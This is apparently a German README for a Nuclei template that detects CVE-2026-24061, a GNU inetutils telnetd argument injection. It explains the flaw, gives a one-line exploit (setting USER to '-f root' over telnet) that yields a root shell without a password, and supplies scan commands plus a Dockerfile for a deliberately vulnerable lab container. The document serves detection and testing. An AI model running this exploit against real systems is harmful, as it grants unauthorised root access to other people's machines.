
Nuclei-Vorlage zur Erkennung von CVE-2026-24061, einer kritischen Telnet-Argumentinjektion in GNU inetutils telnetd, die nicht authentifizierten Root-Zugriff ermöglicht.
Nuclei-Template zur Erkennung der Schwachstelle CVE-2026-24061 in GNU inetutils telnetd, die Root-Zugriff ohne Authentifizierung ermöglicht.
CVE-2026-24061 ist eine kritische Argument-Injection-Schwachstelle in GNU inetutils telnetd, die es einem Angreifer ermöglicht, eine Root-Shell ohne Kenntnis des Passworts zu erhalten.
%U hinzugefügt: /usr/bin/login -p -h %h %?u{-f %u}{%U}
Schwachstelle: Die Umgebungsvariable USER wird über das Telnet-Protokoll (RFC 1572 NEW-ENVIRON) übertragen und nicht bereinigt, bevor sie in den Befehl eingesetzt wird.
Ausnutzung: Der Angreifer setzt USER="-f root" bei der Verbindung:
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
Das Flag -f bedeutet "Authentifizierung überspringen" → Root ohne Passwort 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
Für Tests kann ein anfälliger Docker-Container gestartet werden:
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Start:
# Image erstellen
docker build -t vuln-telnetd .
# Starten
docker run -d -p 2323:23 vuln-telnetd
# Schwachstelle prüfen
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - Kritisch
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Dieses Tool ist ausschließlich für legale Sicherheitstests von Systemen bestimmt, für die Sie eine ausdrückliche Genehmigung haben.
Der Autor übernimmt keine Verantwortung für die missbräuchliche Verwendung dieser Vorlage.
Erstellt von Mr.Zapi